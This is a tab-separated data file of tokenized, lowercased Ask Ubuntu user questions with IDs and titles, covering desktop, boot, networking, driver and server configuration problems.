500565	inconsistent icons in ubuntu unity	i 've downloaded intellij idea , then just unziped it and run it by execute idea.sh in terminal and made a new project . i wanted to see what would happen if i simply right click on icon at the left side bar in unity - > lock to launcher instead of standard way of making new idea.desktop file also used for making eclipse launcher icon . and it just made icon on launcher wich runs that particular project . after that i 've made idea.desktop icon standard way and it looks like this : [ desktop entry ] name=intellij idea type=application exec=idea.sh terminal=false icon=/opt/idea/idea-ic-135.909/bin/idea.png comment=integrated development environment nodisplay=false categories=development ; ide ; name [ en ] =intellij idea x-desktop-file-install-version=0.22 now when i click on that standard idea.desktop it runs another instance of application ( that one which i 've made with right click on icon on left side bar in unity - > lock to launcher ) and it results with situation shown on image below . i am trying to find this something.desktop icon which i have made with lock to launcher if any and delete it , but i ca n't find it in /usr/share/applications . what ubuntu actually does when i click on lock to launcher ? whether it creates some .desktop file or something else ? how can i delete icon made by lock to launcher ?
500566	`` your current hardware enablement stack ( hwe ) is going out of support ''	my ubuntu system now says ; your current hardware enablement stack ( hwe ) is going out of support on 07. aug. 2014 . after this date security updates for critical parts ( kernel and graphics stack ) of your system will no longer be available . and suggests to fix it by doing : sudo apt-get install linux-generic-lts-trusty linux-image-generic-lts-trusty however , on this website : https : //wiki.ubuntu.com/kernel/ltsenablementstack they state the following : those running virtual or cloud images should not need these newer enablement stacks and are thus recommended to remain on the original precise stack and i do run on a vm . so i 'm a little confused . should i update the hwe with apt-get or not ? it seems to me that i really should , as it seems i might miss important security updates if i do n't ... but the website also seems to state that i do n't need to do so if i run virtual ?
500567	network indicator missing in ubuntu 14.04 64 bit	network indicator is been missing from top right corner panel in ubuntu 14.04 64 bit when i run # sudo nm-applet nm-applet-message : using fallback from indicator to gtkstatusicon . already have tried these following steps without success . restart unity panel service with # killall unity-panel-service . reinstalled my network-manager network-manager-gnome . my /etc/network/interfaces only contains the following : auto lo iface lo inet loopback please let me know how i can bring back my network indicator . # no solution yet
500569	macbookpro10,2 thunderbolt intel issue	i 'm running ( k ) ubuntu 14.04 on a macbookpro10,2 . everything works great exceppt when attached to a thunderbolt screen i 'm observing high fan naisle . probably caused by a kworker issue . powertop shows immediate after start : 15.7 ms/s 776.6 interrupt [ 58 ] i915 and after few seconds : 888.0 ms/s 7.1 kwork i915_hotplug_work_func i found this macbook air tlp settings : https : //help.ubuntu.com/community/macbookair6-2/trusty they seem to help temporary , somehow . but after few seconds cpu temp is about 80 째c . i assume the main problen is that i do not get this working : add the following line in /etc/default/grub grub_cmdline_linux_default= '' pcie_aspm=force i915.i915_enable_rc6=1 > i915.i915_enable_fbc=1 i915.lvds_downclock=1 acpi_backlight=vendor '' problem is i 'm booting with refind , grub parames seem to be ignored . sudo tlp stat still shows +++ intel graphics /sys/module/i915/parameters/powersave = 1 ( enabled ) /sys/module/i915/parameters/i915_enable_rc6 = -1 ( use per-chip default ) /sys/module/i915/parameters/i915_enable_fbc = -1 ( use per-chip default ) /sys/module/i915/parameters/lvds_downclock = 0 ( disabled ) /sys/module/i915/parameters/semaphores = -1 ( use per-chip default ) any suggestions welcome ! thanks dom
500571	move/resize xfce4-terminal by command line	how do i move/resize xfce4-terminal by command line the problem is that the command echo -ne '\e [ 3 ; 0 ; 0t ' does not re-position my xfce4-terminal and has no apparent affect . man xfce4-terminal and other answers suggest it should . xfce4-terminal emulates the xterm application developed by the x consortium . in turn , the xterm application emulates the dec vt102 terminal and also supports the dec vt220 escape sequences . http : //invisible-island.net/xterm/ctlseqs/ctlseqs.html http : //rtfm.etla.org/xterm/ctlseq.html the goal is to write a script that creates a few terminals and sets up my working environment without needing to click and resize my terminals to my comfort . what does work is echo -ne '\e [ 8 ; 40 ; 80t ' which the causes the terminal to resize correctly . so why not moving the window ? other information that i am unsure may affect anything : i have tried other numbers such as the sequence '\e [ 3 ; 100 ; 100t ' but nothing seems to relocate the terminal window . i am actually running ubuntu and installed and launch with xfce4 after unity started having issues from an update . xfce4-terminal 0.6.3 ( xfce 4.10 )
500572	boot into windows using grub1.99-21ubuntu3.14	i had a working grub menu list , till i activated express ssd on my ultrabook with both windows 8 and ubuntu 12.04 now i get a screen showing the minimal cli mode which im clueless about . did try using chainloader but it returns with invalid efi path . on pressing tab with chainloader ( hd0 , ( hd0 contains windows , hd1 ubuntu , i do not have a recovery disk ) it shows hd0 , gpt2 & hd0 , gpt6 with filesystem fat and the rest are not a known filesystem . please help . edit : on booting a live usb , it still opens up the grub cli than booting the usb , can not access the usb boot .
500573	how to run php program that saved in opt/lampp/htdocs	i installed xampp in my linux os i also write php program in gedit and then that program saved in /opt/lampp/htdocs but problem is i do n't khow how to run php program that saved in /opt/lampp/htdocs please give me some solution
500576	how to copy a file from a symbian phone to pc using ubuntu	i have tried many times copying out the files present in my symbian phone to my ubuntu pc but it does'nt happen .
500579	opening hyperlink in libreoffice writer	i am inserting a hyperlink into openoffice writer on a highlighted word - 'the_hyperlink ' . i am choosing 'insert ' from the task bar and 'hyperlink ' from the dropdown list . i paste the link into 'target ' and the highlighted 'the_hyperlink ' is already in the text field . click apply . the hyperlink box does n't automatically disappear ( as in , task done ) but if i click out of it it has created a hyperlink . my problem is it does not open the hyperlink if you left click on it . it only does so if you right click and select 'open hyperlink ' . i need it to do the former .
500583	how to block all tcp and udp and other protocol and only allow layer 2 communication ?	sudo ufw disable sudo ufw default deny sudo ufw allow xxxx sudo ufw enable does sudo ufw disable block layer 2 by default ? how to block all tcp , udp and other protocols , so only layer 2 communication is allowed ? how to drop a frame when layer 2 received frame size is greater than 64 ? all these will be in dedicated line of isp . if using iptable , is below command correct ? iptables -n check1 iptables -a input -p all -m length -- length 0 iptables -a check1 -j drop or // drop all iptables -n check1 iptables -a input -p all iptables -a check1 -j drop update : iptable -p option do not have layer 2 after googled how to drop frame over size 64 ? should we consider size of tpacket_hdr as well ? 32+64 = 96 because size of tpacket_hdr = 32
500585	custom update process for ubuntu	i a have remote embedded system with ubuntu on it . also it runs our proprietary java application jar on it . in order to update that jar i have tried to set up private ppa repository , but it seems too complicated for me as a beginner . is there some simpler solution to automate such actions . i just need to have automatic jar update with script execution afterwards to systems behind nat . p.s . i have publicly accessible server . p.s . software is made by us and run only within the companies devices .
500586	access to field 's element via awk	i have the following columns : _111_ [ 555 ] _222_ [ 666 ] _333_ [ 777 ] _444_ [ 888 ] i want to access the 111 from _111_ . or 888 from [ 888 ] . how to access the fields elements with awk .
500587	tuning in satellite channels on mythbuntu	i have recently set up a mythtv system using mythbuntu . it receives satellite via a wintv nova s2-hd card which i connected to my satellite pointing at astra 28.2e . i have set up the card in mythtv , configured the eit and i 'm up to the stage of searching for channels . now , what i want to find out is how to scan for channels such as bbc etc . what frequencies will these be on ? where i was having issues with were getting all the channels which i could have received on my fta box . i hope somebody could help me with this .
500588	how to change update at-spi1.32 to at-spi2 core in ubuntu 12.04 ?	on ubuntu 12.04 by default at-spi1.32 and py-atspi 1.9.0 are installed . i am trying to intstall atspi2-core and pyatspi2 because in there are new methods i need . when i am trying to import like from gi.repository import atspi it will take take old 'atspi1.32` . how to install and set up atspi2 and pyatspi2 on ubuntu12.04 ?
500589	setting macvlan bridge for lxc containers	i am trying to create containers which can be accessed from outside . so i 've chosen the macvlan mode of networking which can assign an ip to the containers in the same network as the host . i have added the following in my /etc/network/interfaces : auto macvlan0 iface macvlan0 inet static pre-up route del default pre-up route del -net aa.bb.cc.0 netmask 255.255.255.0 pre-up ip link add link eth0 name macvlan0 type macvlan mode bridge address 192.168.171.141 this creates a macvlan bridge by the name macvlan0 but i am not able to ping it from inside the container this is the conf file of my container ( i 've mentioned only the nerworking part ) lxc.network.type = macvlan lxc.network.macvlan.mode = bridge lxc.network.flags = up lxc.network.link = eth0 lxc.network.ipv4 = aa.bb.cc.155/24 can anyone tell me what i am doing wrong ?
500590	how to really install gnome desktop	i want to replace unity desktop by gnome desktop . i have installed gnome-shell but what 's i get is not what i want . i want to have the same result as if i installed ubuntu gnome . i have tried fresh install of ubuntu gnome but now i have a problem : i ca n't start any of my installed ubuntu without efi mode and the ubuntu gnome i installed stuck at gnome logo when i run with efi mode . so i restored my system to its original state . when i installed gnome-shell many things stayed the same as in unity . the font are those of unity , scrollbar , window bar color the logo at start ... etc .
500591	merging pages from a single pdf	i have been sent a 3-fold ( 4 facet , double-sided so 8 page per sheet ) leaflet as a pdf . i 'd like to print it but none of the okular print options offer sticking 4 sides next to each other . it 's always a grid . the pdf is currently presented as one long and thin portrait page per page . i would like to merge these so that the pages are combined in sets of 4 side-by side , leaving a landscape document that i can easily send to the printer . just to clarify , there are a lot of questions about merging multiple documents into one . i have no interest in that . i have one document whose pages i wish to merge down .
500592	multiple iso in single bootable dvd	its not just multiple ubuntu distros in single dvd/usb as stated here or ubuntu distos with other utility iso 's in a single dvd/usb i 'm asking . i want to include windows 7 or above version , ubuntu iso 's and utility iso such as boot-repair in a single dvd . 1.multisystem is the best tool i found but it will work only for usb . 2.multicd script only supports linux distributions and not windows . 3.running sardu ( or any windows tools ) from inside wine is not an option i 'm looking for . so is there any tool or script that could combine windows , ubuntu and utility disks ( boot-repair ) iso 's and give out either a bootable iso or directly burn into dvd . thank you .
500594	unable to boot after update	after a update , ubuntu wo n't boot anymore and gives : error : could not read file . if i 'm fast enough to press a button to continue , i get kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) i can however still boot correctly using older kernels . i tried using boot-repair to fix it but that did not help . boot-repair report : http : //paste.ubuntu.com/7829705/ 3.2.0-65 does not work tried updating to the latest version ( 3.2.0-67 ) but that did not help either . 3.2.0-64 still works
500595	how to set mmap for better performance of raw socket	req.tp_block_size=96 ; req.tp_frame_size=96 ; req.tp_block_nr=2 ; req.tp_frame_nr=2 ; if ( ( setsockopt ( fd , sol_packet , packet_rx_ring , ( char * ) & req , sizeof ( req ) ) ) ! = 0 ) { perror ( `` setsockopt ( ) '' ) ; close ( fd ) ; return 1 ; } ; /* mmap ( ) the sucker */ map=mmap ( null , req.tp_block_size * req.tp_block_nr , prot_read|prot_write|prot_exec , map_shared , fd , 0 ) ; if minimum size of frame is 64 , is the final 4 octet . crc . set by operating system ? if i set size of frame as 60 without crc place , can it be successfully transfer among cisco router and switch ? can above minimum setting work for setting allocation of the circular buffer ( ring ) option : packet_tx_ring example tp_block_size= 4096 // minimal size of contiguous block tp_frame_size= 2048 // size of frame tp_block_nr= 4// number of blocks tp_frame_nr= 8// total number of frames , redundant 4096/2048 = 2 , 2*4 = 8 what is the size of tpacket_hdr ? is it 32 bytes size of tpacket_hdr + frame with size 64 what is minimum tp_frame_size ? is it = 32+64 = 96 tp_block_size= 96 tp_frame_size= 96 tp_block_nr = 2 tp_frame_nr = 2 96/96 = 1 , 1*2 = 2 if number of block is less , can it have better performance ? or more blocks is better ? if every frame is just 64 , and send immediately when have msg ret = sendto ( sock , buffer , pkt_index- > pktlen , msg_dontwait , ( struct sockaddr * ) ( void * ) to , sizeof ( struct sockaddr_in ) ) ; ( bonus not needed to answer ) how to see the difference between applied above and not applied ?
500596	ubuntu taskbar hiding	i am using ubuntu12.10 , i wanted to hide the `` taskbar '' . i tried using gconf-editor by giving gconftool-2 -- set -- type bool /apps/panel/toplevels/top_panel_screen0/auto_hide 1 but i could n't find any effect . how can i hide the taskbar and regain it when i need it ?
500597	broken display - black screen	i was changing some settings in compizconfig and things were starting to look bad and kind of glitchy , so i clicked reset to defaults in compizconfig and suddenly , everything disappeared except my background . i had no windows and no launcher , so naturally i rebooted because i could n't do anything and now , since i dual boot , i select ubuntu and it flashes the ubuntu screen with the dots like normal and then the screen is just black . even fail safe graphics mode gives me a black screen . i use ubuntu 14.04 lts .
500598	is there any battery management software to work with a laptop plugged to ac power so as to save the battery lifetime ?	i was used to remove the battery of my laptop whenever i worked with my computer plugged to ac power and to load the battery with the computer switched off so as to save the lifetime of the battery . but on modern laptops it is not possible to remove the battery . i recently purchased a toshiba satellite l50-b-18c laptop and installed ubuntu 14.04 on it . i would like to know if there is any battery management software to work with ubuntu which allows to stop battery charging before it reaches its 100 % capacity and to make it charge again before it reaches a threshold . some people told me that such utilities exist for windows operating systems and i was wondering if similar utilities can be found to work under ubuntu .
500599	how to install microsoft visual studio 2010 in ubuntu ?	how can i install microsoft visual studio 2010 and the .net windows application set up file in ubuntu ?
500600	how use xampp-control-panel for php program in linux	i installed xampp on my ubuntu . i wrote a php program for hello world and saved it as myfirstphp.php in opt/lampp/htdocs/mikpatel/ i opend the xampp-conytrol-panel problems : 1 ) i do n't know what is the use of xampp-control-panel 2 ) i do n't know how php program run using xampp-control-panel .
500601	how to create an ubuntu touch app with a c++ backend and a qml interface	i 'm looking forward to the release of ubuntu touch and thought it would be nice to contribute a small and free app that i 'm also using now on my android phone . the free and open source app for android is called mythmote ( code.google.com/p/mythmote ) and basically establishes a tcp connection to a pc running a mythtv frontend and then transfers streams of data to control it . the info on www.mythtv.org/wiki/frontend_control_socket contains the list of supported commands that can be used . i 've managed to create the app as a qt widgets application and it functions as required . so i have a myapp.pro , mainwindow.h , main.cpp , mainwindow.cpp and a mainwindow.ui file . in other words , it is a desktop app containing c++ code using the qtcpsocket class . what i 'm struggling with at the moment is adding a qml user interface to it so that i can upload it from within the ubuntu sdk so that it can be reviewed . i tried to create a new ubuntu 'app with simple ui ' and then copy paste the c++ code into an added c++ class . this does work because the ubuntu sdk does not allow me to add a c++ class ( gives a file generation failure ) . i tried to create a new ubuntu 'app with qml extension library ' . however i can not publish such a project as it is of the wrong kit type . gives a 'it is not supported to create click packages for a non ubuntusdk target . i found a similar question on this website : ubuntu touch app with c++ core and qml interface . how to create ? the top answer provided does not allow to create a click package and thus does not allow me to publish the app . the bottom answer points to the folowing page but i can not get the example to work and i doubt that it will allow me to publish it : http : //forum.xda-developers.com/showthread.php ? p=41115284 & nocache=1 i also tried to see if qml has something similar to the qtcpsocket class but was unable to find it . so , i 'm hoping that some of you have successfully published an app that has a c++ backend connected to a qml user interface . thanks !
500603	ca n't set assigned ubuntu hard drive in boot sequence	i want to become a first time ubuntu user . i have a desktop with windows xp running on it . now i want to set up a multi boot . i have two hard disk drives . one 60 gb with windows xp ( we call it a ) . the second drive has 500 gb ( lets call this b ) and just data on it . a has 3 partitions ( plus bootsector ) , and b has 2 partitions . i want to install ubuntu on the second partition ( 40 gb ) of drive b . ( the first partition i use for my ( windows ) data files ) . i have reserved a 2 gb partition on drive a for the ubuntu swap-file ( and also an empty 12gb ( fat32 ) partition without a current purpose , but i thought it might be useful sometime perhaps ) . now i have not started to install yet , because i have two problems . i ca n't boot from my dvd-drive , so it wo n't autorun the installation dvd . ( booting from another cd-rom drive is possible ) . but i found a way around this by first running an ide drive diagnostic . by accident i found , that after the diagnostic process , the pc does boot from the dvd drive . my second ( unsolved ) problem -the reason why i 'm posting my question here- is that i ca n't find the drive b in the setting of my bootsequence . it 's just not showing ! while in the ide drive diagnostic it does show , as well as in the running os . [ edit : not showing means : when i enter the boot setup ( using f2 at startup ) , i can alter the boot sequence . but the only options shown are 1 . diskette drive ; 2 . ide cd-rom device ; 3 . hard disk drive c : . i wish to select my wdc-500gb-hard-drive here , but i do n't know how ] . i 've read that the drive that has ubuntu on it , must be first in the bootsequence , in order for grub to make the desired multiboot selector thing . i see three options ( but i not sure how and if possible ) : 1 . find a way to get drive b to appear in the boot sequence setting menu ( my prefference , but clueless on how to do it ) . 2 . set ubuntu on the drive b , but set grub on the drive a ( can this be done ? ) 3 . switch the drives a and b physically ( i 'm very affraid to lose data or functionality ) . can someone help me out ?
500605	how can i download attachments from an email using python ?	my current python script can download attachments from gmail . but i want to download attachments from any other email services than gmail . ex : other email services are ymail , hot mail , etc .. is there any way to proceed ? please help me if it is possible ... try : imapsession = imaplib.imap4_ssl ( 'imap.gmail.com ' ) typ , accountdetails = imapsession.login ( username , passwd ) if typ ! = 'ok ' : print 'not able to sign in ! ' raise imapsession.select ( ' [ gmail ] /all mail ' ) typ , data = imapsession.search ( none , 'unseen ' , ' ( subject `` test '' ) ' ) if typ ! = 'ok ' : print 'error searching inbox . ' raise for msgid in data [ 0 ] .split ( ) : typ , messageparts = imapsession.fetch ( msgid , ' ( rfc822 ) ' ) if typ ! = 'ok ' : print 'error fetching mail . ' raise emailbody = messageparts [ 0 ] [ 1 ] mail = email.message_from_string ( emailbody ) for part in mail.walk ( ) : if part.get_content_maintype ( ) == 'multipart ' : continue if part.get ( 'content-disposition ' ) is none : continue filename = part.get_filename ( ) if bool ( filename ) : filepath = os.path.join ( detach_dir , '/attachments ' , filename ) if not os.path.isfile ( filepath ) : print filename fp = open ( filepath , 'wb ' ) fp.write ( part.get_payload ( decode=true ) ) fp.close ( ) imapsession.close ( ) imapsession.logout ( )
500612	wifi n7260 : direct firmware load failed with error -2	dell laptop . wifi not working after installing ubuntu 14.04 . tried to update firmware , but not working . any ideas ? /var/log/syslog : jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.370168 ] intel ( r ) wireless wifi driver for linux , in-tree : jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.370171 ] copyright ( c ) 2003-2013 intel corporation jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.370312 ] iwlwifi 0000:08:00.0 : irq 65 for msi/msi-x jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.370555 ] iwlwifi 0000:08:00.0 : direct firmware load failed with error -2 jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.370557 ] iwlwifi 0000:08:00.0 : falling back to user helper jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.372460 ] iwlwifi 0000:08:00.0 : loaded firmware version 22.1.7.0 op_mode iwlmvm jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.377572 ] iwlwifi 0000:08:00.0 : detected intel ( r ) wireless n 7260 , rev=0xffffffff jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.377619 ] iwlwifi 0000:08:00.0 : l1 disabled ; enabling l0s jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395299 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395310 ] warning : cpu : 3 pid : 13295 at /build/buildd/linux-3.13.0/drivers/net/wireless/iwlwifi/pcie/trans.c:1002 iwl_trans_pcie_grab_nic_access+0xcb/0xe0 [ iwlwifi ] ( ) jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395311 ] timeout waiting for hardware access ( csr_gp_cntrl 0xffffffff ) jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395312 ] modules linked in : iwlmvm ( + ) iwlwifi ctr ccm rtl8192cu rtl_usb rtlwifi rtl8192c_common arc4 dell_wmi sparse_keymap dell_laptop intel_rapl x86_pkg_temp_thermal intel_powerclamp dcdbas rtl8187 coretemp snd_hda_codec_hdmi snd_hda_codec_realtek mac80211 snd_hda_intel snd_hda_codec kvm_intel uvcvideo snd_hwdep kvm videobuf2_vmalloc videobuf2_memops snd_pcm videobuf2_core snd_page_alloc cfg80211 eeprom_93cx6 serio_raw snd_seq_midi videodev joydev snd_seq_midi_event rtsx_pci_ms snd_rawmidi rfcomm lpc_ich snd_seq bnep memstick mei_me btusb snd_seq_device snd_timer bluetooth snd mei soundcore intel_smartconnect binfmt_misc parport_pc nls_iso8859_1 ppdev lp mac_hid parport dm_crypt hid_generic usbhid hid rtsx_pci_sdmmc crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel aes_x86_64 nouveau lrw gf128mul glue_helper ablk_helper cryptd i915 psmouse mxm_wmi ttm ahci libahci i2c_algo_bit r8169 drm_kms_helper rtsx_pci mii drm wmi video [ last unloaded : iwlwifi ] jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395367 ] cpu : 3 pid : 13295 comm : modprobe tainted : g w 3.13.0-32-generic # 57-ubuntu jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395368 ] hardware name : dell inc. vostro 5470/0g5m5f , bios a05 12/06/2013 jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395370 ] 0000000000000009 ffff8800b9839af8 ffffffff8171bcb4 ffff8800b9839b40 jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395372 ] ffff8800b9839b30 ffffffff810676cd ffff88022f5c8000 ffff88022f5cb258 jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395374 ] ffff8800b9839bd0 0000000000000000 ffff88022d03d7c0 ffff8800b9839b90 jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395377 ] call trace : jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395383 ] [ ] dump_stack+0x45/0x56 jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395386 ] [ ] warn_slowpath_common+0x7d/0xa0 jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395388 ] [ ] warn_slowpath_fmt+0x4c/0x50 jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395393 ] [ ] ? iwl_read32+0x1a/0x80 [ iwlwifi ] jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395397 ] [ ] iwl_trans_pcie_grab_nic_access+0xcb/0xe0 [ iwlwifi ] jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395400 ] [ ] iwl_read_prph+0x2b/0xb0 [ iwlwifi ] jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395404 ] [ ] iwl_pcie_apm_init+0x20d/0x280 [ iwlwifi ] jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395408 ] [ ] iwl_trans_pcie_start_hw+0x55/0x1b0 [ iwlwifi ] jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395415 ] [ ] iwl_op_mode_mvm_start+0x43a/0x570 [ iwlmvm ] jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395419 ] [ ] _iwl_op_mode_start.isra.2+0x4a/0xb0 [ iwlwifi ] jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395423 ] [ ] iwl_opmode_register+0xc1/0xf0 [ iwlwifi ] jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395426 ] [ ] ? 0xffffffffa0743fff jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395431 ] [ ] iwl_mvm_init+0x37/0x1000 [ iwlmvm ] jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395434 ] [ ] do_one_initcall+0xfa/0x1b0 jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395438 ] [ ] ? set_memory_nx+0x43/0x50 jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395442 ] [ ] load_module+0x12dd/0x1b40 jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395445 ] [ ] ? store_uevent+0x40/0x40 jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395448 ] [ ] sys_finit_module+0x86/0xb0 jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395451 ] [ ] tracesys+0xe1/0xe6 jul 21 15:30:21 rwilco-vostro-5470 kernel : [ 2631.395453 ] -- - [ end trace 4add81c2b58868d0 ] -- -
500615	mariadb new install : checking for corrupt , not cleanly closed and upgrade needing tables	i installed mariadb-server . never installed before mysql . /var/lib/mysql was empty . # apt-get install mariadb-server blah~blah~ # service mysql restart * stopping mariadb database server mysqld [ ok ] * starting mariadb database server mysqld [ ok ] * checking for corrupt , not cleanly closed and upgrade needing tables . * checking for corrupt , not cleanly closed and upgrade needing tables . * this is problem . i try rm -rf /var/lib/mysql mysql_install_db mysql_upgrade -p i ca n't remove this corrupt message . how can i ? thank you .
500618	vim no gui and clipboard	i have gnome ubuntu 14.04 and i reinstalled vim ( without gui , i did not enable gui because i do n't think i need it ) and replaced netrw with the latest to have : lexplorer . now when i use vim 's file explorer ( netrw ) , i get this error when i open a file or a folder : error detected while processing function < snr > 32_netrwbrowsechgdir.. < snr > 32_netrwoptionrestore : line 69 : e354 : invalid register name : '*' after many times googling , people say i need clipboard support for vim to fix it . do i need to compile vim with gui to have clipboard support ? or is it possible to enable clipboard without gui and i just need to add some flags during configuration ? thanks
500621	folder icons showing up like files	hi . i am running ubuntu 13.10 . the icons of most folders on my drive and desktop are showing like never-before-seen `` file '' icons . i can click on them and they 'll open , and inside any of the folders , the folder icons are the usual ones : the same orange linux folder icons . additional clarification for clarification , i removed some applications from my system in the earlier session , which included an application that can change the `` folder color . '' i had changed the folder color of `` japanaddicts '' folder to pink , rest all were usual . please tell me how to fix this problem . in that application , there was no such disclaimer that something like this can happen .
500629	ca n't authenticate with exchange server	i 'm using evolution with evolution-mapi to access an exchange e-mail server . it has worked flawlessly in the past , but recently it will fail to authenticate , asking my password endlessly . if i enter the correct password , it tells me that it is incorrect . if i enter an incorrect password , it closes the prompt , but fails to obtain the mail from the inbox ( due to the truly incorrect password ) . edit : i fixed part of the issue by pointing my client to the server 's ip address rather than its hostname , but it will still occasionally fail to send/receive e-mail .
500631	windows 8.1 does n't appear in grub menu	my windows 8.1 does n't appear in grub . do i need to uninstall everything ? i really need windows 8.1 to be accessible .
500632	high hdd temp in my laptop	this is my output of hddtemp /dev/sda /dev/sda : st750lm022 hn-m750mbb : 46°c this makes my laptop way too hot . i have dual boot and i have installed windows . my hdd does not heat up this much in windows . i have gone through some of the questions here in akubuntu . i even tried setting apm to 254 . also my standby time to 10 minutes . but , my hdd does n't show up any improvement i 'm afraid whether this heat will wear out my hdd soon . this is an internal hdd . this is my sensors output virtual device temp1 : +63.0°c temp2 : +63.0°c ( crit = +120.0°c ) temp3 : +30.0°c ( crit = +120.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +65.0°c ( high = +87.0°c , crit = +105.0°c ) core 0 : +65.0°c ( high = +87.0°c , crit = +105.0°c ) core 1 : +63.0°c ( high = +87.0°c , crit = +105.0°c ) core 2 : +56.0°c ( high = +87.0°c , crit = +105.0°c ) core 3 : +57.0°c ( high = +87.0°c , crit = +105.0°c )
500633	print spooler service in ubuntu	i want to share a printer under ubuntu 11.04 with windows 7 . i have installed samba and configured it to allow the printer to be browsed across the network . i have also enabled printer sharing . but when i try to search the printer from windows 7 , it prompts me to start the print spooler in ubuntu print server . how can i start print spooler in ubuntu ? i have also installed cups but not configured it yet . i am able to print from my ubuntu client by using the same network printer in ubunutu print server . can anybody help me to start the print spooler and solve this so that i can print in my windows machine from the linux print server .
500638	nginx reverse proxy and subdomains	i have some problem with nginx configuration . i 've already searched for an issue but the proposed solutions i saw did n't work for me . i have some apps on a tomcat server and some apps on a jboss server . i configured on another server nginx as reverse proxy and it works properly . now , what i would do is to have access to the apps on tomcat and jboss using domain names . eg . i have apps on tomcat onto this address : tomcat.domain.com:8080/app1 ; tomcat.domain.com:8080/app2 and so on , even for jboss apps.. with reverse proxy i have this output : proxy.domain.com/app1 proxy.domain.com/app2 and so on , so i do n't have to specify neither the port number not the belonging to a specified server . but i would use subdomains in this way : app1.domain.com , app2.domain.com and so on . so , my configuration of nginx , the one that works and used just for reverse proxy is that ( i will report the lines about tomcat only , for simplicity ) : upstream tomcat_server { server tomcat.domain.com:8080 ; } server { listen 80 ; location /app1 { proxy_pass http : //tomcat_server ; proxy_set_header x-forwarded-host $ host ; } } for subdomain configuration i modified the part about server definition like this : server { listen 80 ; server_name app1.domain.com ; location / { proxy_pass http : //tomcat_server/app1 ; proxy_set_header x-forwarded-host $ host ; } } as suggested in some forums , but it does n't work . i specify that , on the server that manage dns app1.domain.com points to the proxy.domain.com server . i saw logs , but there was n't any . what should i do ? thanks luciana
500639	auto boot linux . hide boot menu with grub 2	i 've read the forum but it seems my grub boot menu does n't follow the form of the config file . i would like the menu to not appear unless shift is pressed . my current /etc/default/grub is : grub_default=0 grub_hidden_timeout=3 grub_hidden_timeout_quiet=true grub_timeout=0 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash nomdmonddf nomdmonisw '' grub_cmdline_linux= '' '' grub_force_hidden_menu= '' true '' export grub_force_hidden_menu ( i 've tried the true 's with both quotes and no quotes , it makes no difference ) can anyone please tell me why , when my system boots , it just sits at a grub menu ? it 's a headless system which is n't good as i have to add a keyboard to get it to reboot . this is not a dual-boot system . thanks .
500641	how can i find out what plugins i installed for nautilus ?	i have , over time , installed a number of nautilus-related packages . today i 've started having issues with a nautilus feature . i do n't remember what i 've installed now so is it possible to get a list of the nautilus-related packages what i 've installed in the past ?
500642	ctrl + l not working on nautilus	ctrl + l on nautilus go to the shows path of the directory . but not working for . how to fix this ? look this image in the previous i press ctrl + l and next to the home the path bar appear like /home/ .
500643	( solved ) build libqtwebkit4.so from sources	i 'm trying to build libqtwebkit4 from sources : https : //launchpad.net/ubuntu/+source/qtwebkit-source everything goes right : i have instilled all dependencies ( gtk3 , glib , pango , ... ) ./autogen.sh make make install but i ca n't find final libqtwekin4 library . how can i get libqtwebkit from sources ? p.s . i know that i can install package , but i need custom library . thanks .
500644	how to downgrade firefox from 30 to 28 ?	i 've accidentally sudo apt-get upgrade ( while c/p-ing instructions to do something and failing to notice that it is n't sudo apt-get update ) and it upgraded firefox from 28 to 30 . now my menus are completely messed up , so i want ff28 back and i 'm not interested in opinions how newer versions are better ( there are plenty of those in mozilla support forums instead of actual answers ) . also , downloading firefox-mozilla-build_28.0-0ubuntu1_i386.deb and trying to use it apparently does n't work , ubuntu software center says : breaks existing package 'firefox ' that conflict : 'firefox ' .
500645	active launcher icons glow when using numix theme	i 'm running unity with numix gtk theme . when switching between the launcher apps using super + tab , the launcher icons glow to show the current active app is missing . i do n't know if this is because the launcher 'tiles ' are hidden by default . how can i get the glow back ?
